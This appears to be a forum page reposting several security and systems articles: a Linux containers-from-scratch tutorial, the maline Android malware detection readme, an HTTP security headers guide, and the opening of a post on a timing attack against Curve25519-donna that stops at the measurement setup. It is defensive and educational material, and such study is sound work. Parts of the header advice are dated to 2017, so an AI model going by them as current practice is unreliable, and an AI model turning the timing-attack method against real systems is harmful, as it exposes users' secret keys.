Namespaces allow us to create restricted views of systems like the process tree, network interfaces, and mounts. Creating namespace is super easy, just a single syscall with one argument, unshare. The unshare command line tool gives us a nice wrapper around this syscall and lets us setup namespaces manually. In this case, we’ll create a PID namespace for the shell, then execute the chroot like the last example. $ sudo unshare -p -f --mount-proc=$PWD/rootfs/proc \ chroot rootfs /bin/bash root@localhost:/# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 20268 3240 ? S 22:34 0:00 /bin/bash root 2 0.0 0.0 17504 2096 ? R+ 22:34 0:00 ps aux root@localhost:/# Having created a new process namespace, poking around our chroot we’ll notice something a bit funny. Our shell thinks its PID is 1?! What’s more, we can’t see the host’s process tree anymore. Entering namespaces with nsenter A powerful aspect of namespaces is their composability; processes may choose to separate some namespaces but share others. For instance it may be useful for two programs to have isolated PID namespaces, but share a network namespace (e.g. Kubernetes pods). This brings us to the setns syscall and the nsentercommand line tool. Let’s find the shell running in a chroot from our last example. $ # From the host, not the chroot. $ ps aux | grep /bin/bash | grep root ... root 29840 0.0 0.0 20272 3064 pts/5 S+ 17:25 0:00 /bin/bash The kernel exposes namespaces under /proc/(PID)/ns as files. In this case, /proc/29840/ns/pid is the process namespace we’re hoping to join. $ sudo ls -l /proc/29840/ns total 0 lrwxrwxrwx. 1 root root 0 Oct 15 17:31 ipc -> 'ipc:[4026531839]' lrwxrwxrwx. 1 root root 0 Oct 15 17:31 mnt -> 'mnt:[4026532434]' lrwxrwxrwx. 1 root root 0 Oct 15 17:31 net -> 'net:[4026531969]' lrwxrwxrwx. 1 root root 0 Oct 15 17:31 pid -> 'pid:[4026532446]' lrwxrwxrwx. 1 root root 0 Oct 15 17:31 user -> 'user:[4026531837]' lrwxrwxrwx. 
1 root root 0 Oct 15 17:31 uts -> 'uts:[4026531838]'

The nsenter command provides a wrapper around setns to enter a namespace. We'll provide the namespace file, then run unshare to remount /proc and chroot to set up the chroot. This time, instead of creating a new namespace, our shell will join the existing one.

$ sudo nsenter --pid=/proc/29840/ns/pid \
    unshare -f --mount-proc=$PWD/rootfs/proc \
    chroot rootfs /bin/bash
root@localhost:/# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 20272 3064 ? S+ 00:25 0:00 /bin/bash
root 5 0.0 0.0 20276 3248 ? S 00:29 0:00 /bin/bash
root 6 0.0 0.0 17504 1984 ? R+ 00:30 0:00 ps aux

Having entered the namespace successfully, when we run ps in the second shell (PID 5) we see the first shell (PID 1).

Getting around chroot with mounts

When deploying an "immutable" container it often becomes important to inject files or directories into the chroot, either for storage or configuration. For this example, we'll create some files on the host, then expose them read-only to the chrooted shell using mount.

First, let's make a new directory to mount into the chroot and create a file there.

$ sudo mkdir readonlyfiles
$ echo "hello" > readonlyfiles/hi.txt

Next, we'll create a target directory in our container and bind mount the directory, providing the -o ro argument to make it read-only. If you've never seen a bind mount before, think of this like a symlink on steroids.

$ sudo mkdir -p rootfs/var/readonlyfiles
$ sudo mount --bind -o ro $PWD/readonlyfiles $PWD/rootfs/var/readonlyfiles

The chrooted process can now see the mounted files.

$ sudo chroot rootfs /bin/bash
root@localhost:/# cat /var/readonlyfiles/hi.txt
hello

However, it can't write to them.

root@localhost:/# echo "bye" > /var/readonlyfiles/hi.txt
bash: /var/readonlyfiles/hi.txt: Read-only file system

Though a pretty basic example, it can actually be expanded quickly for things like NFS, or in-memory file systems, by switching the arguments to mount.
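Two processes share a namespace exactly when their /proc/<pid>/ns symlinks point at the same inode, so comparing the link targets is an easy check. A small sketch (the helper names are mine, not from the article):

```python
import re

def ns_id(link_target):
    """Parse a /proc/<pid>/ns symlink target such as 'pid:[4026532446]'."""
    m = re.match(r"^(\w+):\[(\d+)\]$", link_target)
    if m is None:
        raise ValueError("not a namespace link: %r" % link_target)
    return m.group(1), int(m.group(2))

def same_namespace(a, b):
    """True when two namespace link targets refer to the same kernel namespace."""
    return ns_id(a) == ns_id(b)

# The chrooted shell's PID namespace vs. the host's:
print(same_namespace("pid:[4026532446]", "pid:[4026531836]"))  # False
```

In practice the link targets would come from something like os.readlink("/proc/29840/ns/pid"), which requires appropriate permissions.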
Use umount to remove the bind mount (rm won't work).

$ sudo umount $PWD/rootfs/var/readonlyfiles

cgroups

cgroups, short for control groups, allow kernel-imposed isolation on resources like memory and CPU. After all, what's the point of isolating processes if they can still kill neighbors by hogging RAM? The kernel exposes cgroups through the /sys/fs/cgroup directory. If your machine doesn't have one, you may have to mount the memory cgroup to follow along.

$ ls /sys/fs/cgroup/
blkio cpuacct cpuset freezer memory net_cls,net_prio perf_event systemd
cpu cpu,cpuacct devices hugetlb net_cls net_prio pids

For this example we'll create a cgroup to restrict the memory of a process. Creating a cgroup is easy: just create a directory. In this case we'll create a memory group called "demo". Once created, the kernel fills the directory with files that can be used to configure the cgroup.

$ sudo su
# mkdir /sys/fs/cgroup/memory/demo
# ls /sys/fs/cgroup/memory/demo/
cgroup.clone_children               memory.memsw.failcnt
cgroup.event_control                memory.memsw.limit_in_bytes
cgroup.procs                        memory.memsw.max_usage_in_bytes
memory.failcnt                      memory.memsw.usage_in_bytes
memory.force_empty                  memory.move_charge_at_immigrate
memory.kmem.failcnt                 memory.numa_stat
memory.kmem.limit_in_bytes          memory.oom_control
memory.kmem.max_usage_in_bytes      memory.pressure_level
memory.kmem.slabinfo                memory.soft_limit_in_bytes
memory.kmem.tcp.failcnt             memory.stat
memory.kmem.tcp.limit_in_bytes      memory.swappiness
memory.kmem.tcp.max_usage_in_bytes  memory.usage_in_bytes
memory.kmem.tcp.usage_in_bytes      memory.use_hierarchy
memory.kmem.usage_in_bytes          notify_on_release
memory.limit_in_bytes               tasks
memory.max_usage_in_bytes

To adjust a value we just have to write to the corresponding file. Let's limit the cgroup to 100MB of memory and turn off swap.
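The configuration boils down to two file writes, which can be sketched as data first (paths follow the cgroup-v1 layout used in this article; the "demo" group name matches the example):

```python
import os

CGROUP = "/sys/fs/cgroup/memory/demo"  # memory cgroup created with mkdir

def memory_cgroup_writes(limit_bytes, swappiness=0):
    """Return the (file, value) pairs that cap memory and disable swap."""
    return [
        (os.path.join(CGROUP, "memory.limit_in_bytes"), str(limit_bytes)),
        (os.path.join(CGROUP, "memory.swappiness"), str(swappiness)),
    ]

for path, value in memory_cgroup_writes(100000000):
    print(value, ">", path)
```

Actually performing the writes (open(path, "w").write(value)) requires root, just like the shell version.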
# echo "100000000" > /sys/fs/cgroup/memory/demo/memory.limit_in_bytes
# echo "0" > /sys/fs/cgroup/memory/demo/memory.swappiness

The tasks file is special: it contains the list of processes which are assigned to the cgroup. To join the cgroup we can write our own PID.

# echo $$ > /sys/fs/cgroup/memory/demo/tasks

Finally we need a memory hungry application.

f = open("/dev/urandom", "rb")  # binary mode, so this also runs under Python 3
data = b""
i = 0
while True:
    data += f.read(10000000)  # 10mb
    i += 1
    print("%dmb" % (i * 10,))

If you've set up the cgroup correctly, this program won't crash your computer.

# python hungry.py
10mb
20mb
30mb
40mb
50mb
60mb
70mb
80mb
Killed

If that didn't crash your computer, congratulations!

cgroups can't be removed until every process in the tasks file has exited or been reassigned to another group. Exit the shell and remove the directory with rmdir (don't use rm -r).

# exit
exit
$ sudo rmdir /sys/fs/cgroup/memory/demo

Container security and capabilities

Containers are extremely effective ways of running arbitrary code from the internet as root, and this is where the low overhead of containers hurts us. Containers are significantly easier to break out of than a VM. As a result, many technologies used to improve the security of containers, such as SELinux, seccomp, and capabilities, involve limiting the power of processes already running as root. In this section we'll be exploring Linux capabilities.

Consider the following Go program which attempts to listen on port 80.

package main

import (
    "fmt"
    "net"
    "os"
)

func main() {
    if _, err := net.Listen("tcp", ":80"); err != nil {
        fmt.Fprintln(os.Stdout, err)
        os.Exit(2)
    }
    fmt.Println("success")
}

What happens when we compile and run this?

$ go build -o listen listen.go
$ ./listen
listen tcp :80: bind: permission denied

Predictably this program fails; listening on port 80 requires permissions we don't have. Of course we can just use sudo, but we'd like to give the binary just the one permission to listen on lower ports.
Capabilities are a set of discrete powers that together make up everything root can do. This ranges from things like setting the system clock to killing arbitrary processes. In this case, CAP_NET_BIND_SERVICE allows executables to listen on lower ports. We can grant the executable CAP_NET_BIND_SERVICE using the setcap command.

$ sudo setcap cap_net_bind_service=+ep listen
$ getcap listen
listen = cap_net_bind_service+ep
$ ./listen
success

For things already running as root, like most containerized apps, we're more interested in taking capabilities away than granting them. First let's see all the powers our root shell has:

$ sudo su
# capsh --print
Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,37+ep
Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,37
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
uid=0(root) gid=0(root) groups=0(root)

Yeah, that's a lot of capabilities.
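Capability sets like the Current and Bounding lines above are just bitmasks: capability number N is bit N of the mask. A small sketch of that arithmetic (the constants follow the numbering in linux/capability.h):

```python
# Capability numbers from include/uapi/linux/capability.h
CAP_CHOWN = 0
CAP_NET_BIND_SERVICE = 10

def has_cap(mask, cap):
    """Check whether capability number `cap` is present in a bitmask."""
    return bool((mask >> cap) & 1)

def drop_cap(mask, cap):
    """Return the mask with one capability removed, as capsh --drop does."""
    return mask & ~(1 << cap)

full = (1 << 38) - 1  # all capabilities up to number 37, as in the capsh output
dropped = drop_cap(full, CAP_CHOWN)
print(has_cap(dropped, CAP_CHOWN))             # False
print(has_cap(dropped, CAP_NET_BIND_SERVICE))  # True
```

This is the same model the kernel exposes as hex masks in the CapEff/CapBnd lines of /proc/<pid>/status.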
As an example, we'll use capsh to drop a few capabilities, including CAP_CHOWN. If things work as expected, our shell shouldn't be able to modify file ownership despite being root.

$ sudo capsh --drop=cap_chown,cap_setpcap,cap_setfcap,cap_sys_admin --chroot=$PWD/rootfs --
root@localhost:/# whoami
root
root@localhost:/# chown nobody /bin/ls
chown: changing ownership of '/bin/ls': Operation not permitted

Conventional wisdom still states that VM isolation is mandatory when running untrusted code. But security features like capabilities are important to protect against hacked applications running in containers. Beyond more elaborate tools like seccomp, SELinux, and capabilities, applications running in containers generally benefit from the same kind of best practices as applications running outside of one. Know what you're linking against, don't run as root in your container, and update for known security issues in a timely fashion.

Conclusion

Containers aren't magic. Anyone with a Linux machine can play around with them, and tools like Docker and rkt are just wrappers around things built into every modern kernel. No, you probably shouldn't go and implement your own container runtime. But having a better understanding of these lower level technologies will help you work with the higher level tools (especially when debugging). There are a ton of topics I wasn't able to cover today, networking and copy-on-write file systems probably being the biggest two. However, I hope this acts as a good starting point for anyone wanting to get their hands dirty. Happy hacking!

Sursa: https://ericchiang.github.io/post/containers-from-scratch//
Table of Contents

1. Introduction
2. Installation
2.1. Dependencies
2.2. Building
3. Configuration
3.1. Unpacking the SDK
3.2. Path to Executables
3.3. Android Virtual Device
4. Usage
5. Emulab
6. Copyright

Introduction

maline is a free software Android malware detection framework. If you are an Org-mode user, you might want to read the executable version of this readme (the README.org file in the root). If you are interested in running extensive experiments with maline, take a look at the README file in the env/emulab directory, where you can find a lot of information on setting up a reproducible research environment.

Installation

*NOTE: We are in the process of debugging instructions for running maline in a virtual machine, as there are some issues with that. We, the authors, got it working successfully on physical machines only.*

maline has been developed under Ubuntu 12.04.3 LTS. It is very likely it will work under other POSIX systems too (GNU/Linux and Mac alike). The Android version we tested maline with is Android 4.4.3 (API version 19), which is assumed throughout the readme.

To make it easier to start using maline, we created a Vagrant configuration file that sets up a virtual machine and installs maline in it. If you want to run maline in such a way, you can simply run the following command in the root of this project:

vagrant up

and skip the rest of this section on dependencies and installing them. However, you will need to install an Android Virtual Device, as described below.

Sursa: https://github.com/soarlab/maline
Everything you need to know about HTTP security headers

13 JANUARY 2017 on Security, Programming, Web

Some physicists 28 years ago needed a way to easily share experimental data and thus the web was born. This was generally considered to be a good move. Unfortunately, everything physicists touch — from trigonometry to the strong nuclear force — eventually becomes weaponized and so too has the Hypertext Transfer Protocol.

What can be attacked must be defended, and since tradition requires all security features to be a bolted-on afterthought, things… got a little complicated.

This article explains what secure headers are and how to implement these headers in Rails, Django, Express.js, Go, Nginx, and Apache. Please note that some headers may be best configured on your HTTP servers, while others should be set on the application layer. Use your own discretion here. You can test how well you're doing with Mozilla's Observatory. Did we get anything wrong? Contact us at hello@appcanary.com.

HTTP Security Headers
X-XSS-Protection: Why? / Should I use it? / How? / I want to know more
Content Security Policy: Why? / Should I use it? / How? / I want to know more
HTTP Strict Transport Security (HSTS): Why? / Should I use it? / How? / I want to know more
HTTP Public Key Pinning (HPKP): Why? / Should I use it? / How? / I want to know more
X-Frame-Options: Why? / Should I use it? / How? / I want to know more
X-Content-Type-Options: Why? / Should I use it? / How?
Referrer-Policy: Why? / Should I use it? / How? / I want to know more
Cookie Options: Why? / Should I use it? / How?

X-XSS-Protection

X-XSS-Protection: 0;
X-XSS-Protection: 1;
X-XSS-Protection: 1; mode=block

Why?

Cross Site Scripting, commonly abbreviated XSS, is an attack where the attacker causes a page to load some malicious javascript. X-XSS-Protection is a feature in Chrome and Internet Explorer that is designed to protect against "reflected" XSS attacks — where an attacker is sending the malicious payload as part of the request.

X-XSS-Protection: 0 turns it off.
X-XSS-Protection: 1 will filter out scripts that came from the request - but will still render the page.
X-XSS-Protection: 1; mode=block will, when triggered, block the whole page from being rendered.

Should I use it?

Yes. Set X-XSS-Protection: 1; mode=block. The "filter bad scripts" mechanism is problematic; see here for why.

How?

Platform What do I do?
Rails 4 and 5: On by default
Django: SECURE_BROWSER_XSS_FILTER = True
Express.js: Use helmet
Go: Use unrolled/secure
Nginx: add_header X-XSS-Protection "1; mode=block";
Apache: Header always set X-XSS-Protection "1; mode=block"

I want to know more

X-XSS-Protection - MDN

Content Security Policy

Content-Security-Policy: <policy>

Why?

Content Security Policy can be thought of as a much more advanced version of the X-XSS-Protection header above. While X-XSS-Protection will block scripts that come from the request, it's not going to stop an XSS attack that involves storing a malicious script on your server or loading an external resource with a malicious script in it.

CSP gives you a language to define where the browser can load resources from. You can white list origins for scripts, images, fonts, stylesheets, etc in a very granular manner. You can also compare any loaded content against a hash or signature.

Should I use it?

Yes. It won't prevent all XSS attacks, but it's a significant mitigation against their impact, and an important aspect of defense-in-depth. That said, it can be hard to implement. If you're an intrepid reader and went ahead and checked the headers appcanary.com returns, you'll see that we don't have CSP implemented yet. There are some rails development plugins we're using that are holding us back from a CSP implementation that will have an actual security impact. We're working on it, and will write about it in the next instalment!

How?

Writing a CSP policy can be challenging. See here for a list of all the directives you can employ. A good place to start is here.

Platform What do I do?
Rails 4 and 5: Use secureheaders
Django: Use django-csp
Express.js: Use helmet/csp
Go: Use unrolled/secure
Nginx: add_header Content-Security-Policy "<policy>";
Apache: Header always set Content-Security-Policy "<policy>"

I want to know more

Content-Security-Policy - MDN
CSP Quick Reference Guide
Google's CSP Guide

HTTP Strict Transport Security (HSTS)

Strict-Transport-Security: max-age=<expire-time>
Strict-Transport-Security: max-age=<expire-time>; includeSubDomains
Strict-Transport-Security: max-age=<expire-time>; preload

Why?

When we want to securely communicate with someone, we face two problems. The first problem is privacy; we want to make sure the messages we send can only be read by the recipient, and no one else. The other problem is that of authentication: how do we know the recipient is who they say they are?

HTTPS solves the first problem with encryption, though it has some major issues with authentication (more on this later, see Public Key Pinning). The HSTS header solves the meta-problem: how do you know if the person you're talking to actually supports encryption?

HSTS mitigates an attack called sslstrip. Suppose you're using a hostile network, where a malicious attacker controls the wifi router. The attacker can disable encryption between you and the websites you're browsing. Even if the site you're accessing is only available over HTTPS, the attacker can man-in-the-middle the HTTP traffic and make it look like the site works over unencrypted HTTP. No need for SSL certs, just disable the encryption.

Enter HSTS. The Strict-Transport-Security header solves this by letting your browser know that it must always use encryption with your site. As long as your browser has seen an HSTS header — and it hasn't expired — it will not access the site unencrypted, and will error out if it's not available over HTTPS.

Should I use it?

Yes. Your app is only available over HTTPS, right? Trying to browse over regular old HTTP will redirect to the secure site, right?
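A sketch of how a client could interpret the directives of a Strict-Transport-Security value (a toy parser for illustration, not a browser's actual implementation):

```python
def parse_hsts(value):
    """Split an HSTS header value into its three possible directives."""
    policy = {"max_age": None, "include_subdomains": False, "preload": False}
    for directive in value.split(";"):
        directive = directive.strip().lower()
        if directive.startswith("max-age="):
            policy["max_age"] = int(directive.split("=", 1)[1])
        elif directive == "includesubdomains":
            policy["include_subdomains"] = True
        elif directive == "preload":
            policy["preload"] = True
    return policy

print(parse_hsts("max-age=31536000; includeSubDomains"))
# {'max_age': 31536000, 'include_subdomains': True, 'preload': False}
```

Once a conforming client has stored this policy, it refuses plain-HTTP connections to the host until max_age seconds have elapsed.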
(Hint: Use letsencrypt if you want to avoid the racket that are commercial certificate authorities.)

The one downside of the HSTS header is that it allows for a clever technique to create supercookies that can fingerprint your users. As a website operator, you probably already track your users somewhat - but try to only use HSTS for good and not for supercookies.

How?

The two options are:

includeSubDomains - HSTS applies to subdomains
preload - Google maintains a service that hardcodes your site as being HTTPS only into browsers. This way, a user doesn't even have to visit your site: their browser already knows it should reject unencrypted connections. Getting off that list is hard, by the way, so only turn it on if you know you can support HTTPS forever on all your subdomains.

Platform What do I do?
Rails 4: config.force_ssl = true (does not include subdomains by default; to set it: config.ssl_options = { hsts: { subdomains: true } })
Rails 5: config.force_ssl = true
Django: SECURE_HSTS_SECONDS = 31536000 and SECURE_HSTS_INCLUDE_SUBDOMAINS = True
Express.js: Use helmet
Go: Use unrolled/secure
Nginx: add_header Strict-Transport-Security "max-age=31536000; includeSubdomains;";
Apache: Header always set Strict-Transport-Security "max-age=31536000; includeSubdomains;"

I want to know more

RFC 6797
Strict-Transport-Security - MDN

HTTP Public Key Pinning (HPKP)

Public-Key-Pins: pin-sha256=<base64==>; max-age=<expireTime>;
Public-Key-Pins: pin-sha256=<base64==>; max-age=<expireTime>; includeSubDomains
Public-Key-Pins: pin-sha256=<base64==>; max-age=<expireTime>; report-uri=<reportURI>

Why?

The HSTS header described above was designed to ensure that all connections to your website are encrypted. However, nowhere does it specify what key to use!

Trust on the web is based on the certificate authority (CA) model. Your browser and operating system ship with the public keys of some trusted certificate authorities, which are usually specialized companies and/or nation states.
When a CA issues you a certificate for a given domain, that means anyone who trusts that CA will automatically trust the SSL traffic you encrypt using that certificate. The CAs are responsible for verifying that you actually own a domain (this can be anything from sending an email, to asking you to host a file, to investigating your company).

Two CAs can issue a certificate for the same domain to two different people, and browsers will trust both. This creates a problem, especially since CAs can be and are compromised. This allows attackers to MiTM any domain they want, even if that domain uses SSL & HSTS!

The HPKP header tries to mitigate this. This header lets you "pin" a certificate. When a browser sees the header for the first time, it will save the certificate. For every request up to max-age, the browser will fail unless at least one certificate in the chain sent from the server has a fingerprint that was pinned. This means that you can pin to the CA or an intermediate certificate along with the leaf in order to not shoot yourself in the foot (more on this later).

Much like HSTS above, the HPKP header also has some privacy implications. These were laid out in the RFC itself.

Should I use it?

Probably not. HPKP is a very very sharp knife. Consider this: if you pin to the wrong certificate, or you lose your keys, or something else goes wrong, you've locked your users out of your site. All you can do is wait for the pin to expire.

This article lays out the case against it, and includes a fun way for attackers to use HPKP to hold their victims ransom.

One alternative is using the Public-Key-Pins-Report-Only header, which will just report that something went wrong, but not lock anyone out. This allows you to at least know your users are being MiTMed with fake certificates.

How?
The two options are:

includeSubDomains - HPKP applies to subdomains
report-uri - Invalid attempts will be reported here

You have to generate a base64 encoded fingerprint for the key you pin to, and you have to use a backup key. Check this guide for how to do it.

Platform What do I do?
Rails 4 and 5: Use secureheaders
Django: Write custom middleware
Express.js: Use helmet
Go: Use unrolled/secure
Nginx: add_header Public-Key-Pins 'pin-sha256="<primary>"; pin-sha256="<backup>"; max-age=5184000; includeSubDomains';
Apache: Header always set Public-Key-Pins 'pin-sha256="<primary>"; pin-sha256="<backup>"; max-age=5184000; includeSubDomains';

I want to know more

RFC 7469
HTTP Public Key Pinning (HPKP) - MDN

X-Frame-Options

X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
X-Frame-Options: ALLOW-FROM https://example.com/

Why?

Before we started giving dumb names to vulnerabilities, we used to give dumb names to hacking techniques. "Clickjacking" is one of those dumb names. The idea goes like this: you create an invisible iframe, place it in focus and route user input into it. As an attacker, you can then trick people into playing a browser-based game while their clicks are being registered by a hidden iframe displaying twitter - forcing them to non-consensually retweet all of your tweets. It sounds dumb, but it's an effective attack.

Should I use it?

Yes. Your app is a beautiful snowflake. Do you really want some genius shoving it into an iframe so they can vandalize it?

How?

X-Frame-Options has three modes, which are pretty self explanatory.

DENY - No one can put this page in an iframe
SAMEORIGIN - The page can only be displayed in an iframe by someone on the same origin.
ALLOW-FROM - Specify a specific url that can put the page in an iframe

One thing to remember is that you can stack iframes as deep as you want, and in that case, the behavior of SAMEORIGIN and ALLOW-FROM isn't specified.
That is, if we have a triple-decker iframe sandwich and the innermost iframe has SAMEORIGIN, do we care about the origin of the iframe around it, or the topmost one on the page? ¯\_(ツ)_/¯.

Platform What do I do?
Rails 4 and 5: SAMEORIGIN is set by default. To set DENY: config.action_dispatch.default_headers['X-Frame-Options'] = "DENY"
Django: MIDDLEWARE = [ ... 'django.middleware.clickjacking.XFrameOptionsMiddleware', ... ] This defaults to SAMEORIGIN. To set DENY: X_FRAME_OPTIONS = 'DENY'
Express.js: Use helmet
Go: Use unrolled/secure
Nginx: add_header X-Frame-Options "DENY";
Apache: Header always set X-Frame-Options "DENY"

I want to know more

RFC 7034
X-Frame-Options - MDN

X-Content-Type-Options

X-Content-Type-Options: nosniff;

Why?

The problem this header solves is called "MIME sniffing", which is actually a browser "feature". In theory, every time your server responds to a request it is supposed to set a Content-Type header in order to tell the browser if it's getting some HTML, a cat gif, or a Flash cartoon from 2008. Unfortunately, the web has always been broken and has never really followed a spec for anything; back in the day lots of people didn't bother to set the content type header properly.

As a result, browser vendors decided they should be really helpful and try to infer the content type by inspecting the content itself while completely ignoring the content type header. If it looks like a gif, display a gif!, even though the content type is text/html. Likewise, if it looks like we got some HTML, we should render it as such even if the server said it's a gif.

This is great, except when you're running a photo-sharing site, and users can upload photos that look like HTML with javascript included, and suddenly you have a stored XSS attack on your hands. The X-Content-Type-Options header exists to tell the browser to shut up and set the damn content type to what I tell you, thank you.

Should I use it?

Yes, just make sure to set your content types correctly.

How?
Platform What do I do?
Rails 4 and 5: On by default
Django: SECURE_CONTENT_TYPE_NOSNIFF = True
Express.js: Use helmet
Go: Use unrolled/secure
Nginx: add_header X-Content-Type-Options nosniff;
Apache: Header always set X-Content-Type-Options nosniff

Referrer-Policy

Referrer-Policy: "no-referrer"
Referrer-Policy: "no-referrer-when-downgrade"
Referrer-Policy: "origin"
Referrer-Policy: "origin-when-cross-origin"
Referrer-Policy: "same-origin"
Referrer-Policy: "strict-origin"
Referrer-Policy: "strict-origin-when-cross-origin"
Referrer-Policy: "unsafe-url"

Why?

Ah, the Referer header. Great for analytics, bad for your users' privacy. At some point the web got woke and decided that maybe it wasn't a good idea to send it all the time. And while we're at it, let's spell "Referrer" correctly.

The Referrer-Policy header allows you to specify when the browser will set a Referer header.

Should I use it?

It's up to you, but it's probably a good idea. If you don't care about your users' privacy, think of it as a way to keep your sweet sweet analytics to yourself and out of your competitors' grubby hands. Set Referrer-Policy: "no-referrer"

How?

Platform What do I do?
Rails 4 and 5: Use secureheaders
Django: Write custom middleware
Express.js: Use helmet
Go: Write custom middleware
Nginx: add_header Referrer-Policy "no-referrer";
Apache: Header always set Referrer-Policy "no-referrer"

I want to know more

Referrer-Policy - MDN

Cookie Options

Set-Cookie: <key>=<value>; Expires=<expiryDate>; Secure; HttpOnly; SameSite=strict

Why?

This isn't a security header per se, but there are three different options for cookies that you should be aware of.

Cookies marked as Secure will only be served over HTTPS. This prevents someone from reading the cookies in a MiTM attack where they can force the browser to visit a given page.

HttpOnly is a misnomer, and has nothing to do with HTTPS (unlike Secure above). Cookies marked as HttpOnly can not be accessed from within javascript.
So if there is an XSS flaw, the attacker can't immediately steal the cookies.

SameSite helps defend against Cross-Site Request Forgery (CSRF) attacks. This is an attack where a different website the user may be visiting inadvertently tricks them into making a request against your site, i.e. by including an image to make a GET request, or using javascript to submit a form for a POST request. Generally, people defend against this using CSRF tokens. A cookie marked as SameSite won't be sent to a different site. It has two modes, lax and strict. Lax mode allows the cookie to be sent in a top-level context for GET requests (i.e. if you clicked a link). Strict doesn't send any third-party cookies.

Should I use it?

You should absolutely set Secure and HttpOnly. Unfortunately, as of writing, SameSite cookies are available only in Chrome and Opera, so you may want to ignore them for now.

How?

Platform What do I do?
Rails 4 and 5: Secure and HttpOnly enabled by default. For SameSite, use secureheaders
Django: Session cookies are HttpOnly by default. To set secure: SESSION_COOKIE_SECURE = True. Not sure about SameSite.
Express.js: cookie: { secure: true, httpOnly: true, sameSite: true }
Go: http.Cookie{Name: "foo", Value: "bar", HttpOnly: true, Secure: true} For SameSite, see this issue.
Nginx: You probably won't set session cookies in Nginx
Apache: You probably won't set session cookies in Apache

Thanks to @wolever for python advice

Sursa: https://blog.appcanary.com/2017/http-security-headers.html
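Putting the three cookie flags together, a server-side sketch (a hypothetical helper, not from the article) of how the Set-Cookie value is assembled:

```python
def set_cookie_value(name, value, secure=True, http_only=True, same_site="Strict"):
    """Build a Set-Cookie header value with the hardening flags discussed above."""
    parts = ["%s=%s" % (name, value)]
    if secure:
        parts.append("Secure")        # only sent over HTTPS
    if http_only:
        parts.append("HttpOnly")      # invisible to javascript
    if same_site:
        parts.append("SameSite=%s" % same_site)  # withheld from cross-site requests
    return "; ".join(parts)

print(set_cookie_value("session", "abc123"))
# session=abc123; Secure; HttpOnly; SameSite=Strict
```

In a real application you would let your framework's cookie API emit this, but the resulting header value is exactly this shape.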
When Constant-Time Source Code May Not Save You

Thierry Kaufmann
January 16, 2017
Conferences and events, Crypto

On November 14 at CANS 2016 in Milan I presented a timing attack against an implementation of Curve25519 (also called X25519). This elliptic curve was designed by DJ Bernstein in order to provide a secure curve without probable NSA back doors and with safe computations. Additionally, it was designed to be protected against state-of-the-art timing attacks. The targeted implementation, called Curve25519-donna, essentially follows the prescriptions of the informational RFC 7748, Elliptic Curves for Security. The purpose of this recommendation is to avoid the use of weak ECC designs containing timing-dependent instructions. While it is a good idea to set some minimum security requirements, those are generally not sufficient. I will show this with a timing attack against Curve25519-donna. The implementation is publicly available on Github and follows Bernstein's first design. It is used for the computation of a shared secret with ECDH.

This blog post will not provide all the details of the attack. If you are interested in knowing more, have a look at the paper When Constant-Time Source Yields Variable-Time Binary: Exploiting Curve25519-donna Built with MSVC 2015.

Presentation of the implementation of the curve

The equation of the elliptic curve is given by y^2 = x^3 + 486662*x^2 + x over the field GF(p) with p = 2^255 - 19. The computations are only executed on the X-coordinate. The value of a coordinate can be seen as a large integer, and this integer can be written as a polynomial in order to improve the computations: x = sum over i = 0..9 of x_i * 2^ceil(25.5*i), with the coefficients x_i bounded (alternating 26-bit and 25-bit limbs). This allows storing 10 coefficients with a bounded value. There is no point validation: any 32-byte integer can be given as a point and the multiplication will be executed safely. There are however two restrictions on the private key: the leading 1 must be at bit position 254 and the last three bits must be zero.
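The 10-coefficient representation can be reproduced in a few lines of Python (a sketch of the packing only; donna's C code of course operates on these limbs directly):

```python
import math

# Bit offsets of the 10 limbs: 0, 26, 51, 77, 102, 128, 153, 179, 204, 230
EXP = [math.ceil(25.5 * i) for i in range(10)]

def to_limbs(x):
    """Split an integer x < 2^255 into donna's coefficients x_i,
    so that x = sum(x_i * 2^ceil(25.5*i))."""
    limbs = []
    for i in range(10):
        width = (EXP[i + 1] if i < 9 else 255) - EXP[i]  # alternating 26/25 bits
        limbs.append(x & ((1 << width) - 1))
        x >>= width
    return limbs

def from_limbs(limbs):
    """Reassemble the integer from its 10 coefficients."""
    return sum(l << e for l, e in zip(limbs, EXP))

x = (2**255 - 19) - 12345  # an arbitrary field element
assert from_limbs(to_limbs(x)) == x
```

The alternating 26/25-bit widths keep every coefficient small enough that limb products fit comfortably in 64-bit intermediates.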
For scalar multiplication Curve25519-donna uses a specific implementation of the Montgomery ladder allowing the execution of the exact same instructions whether the key bit value is 0 or 1.

Setup

The idea of the timing attack is to measure the time needed for a user to compute the shared secret with the point we sent them. If the timing depends on the input, the next step consists of finding a link between the timing leakage and some secret data, for example a secret key. In our case we want to recover the secret key used to compute the shared secret in the ECDH protocol. For this we only have access to the time required to do the computation of the multiplication of a point and the secret key, as shown in Figure 1.

Figure 1. ECDH protocol.

In order to measure the timings, the Intel assembly instruction rdtsc (read time stamp counter) was used. To make the measurements more stable, it was called the following way:

getTicksBeginning();
getTicksEnd();
getTicksBeginning();
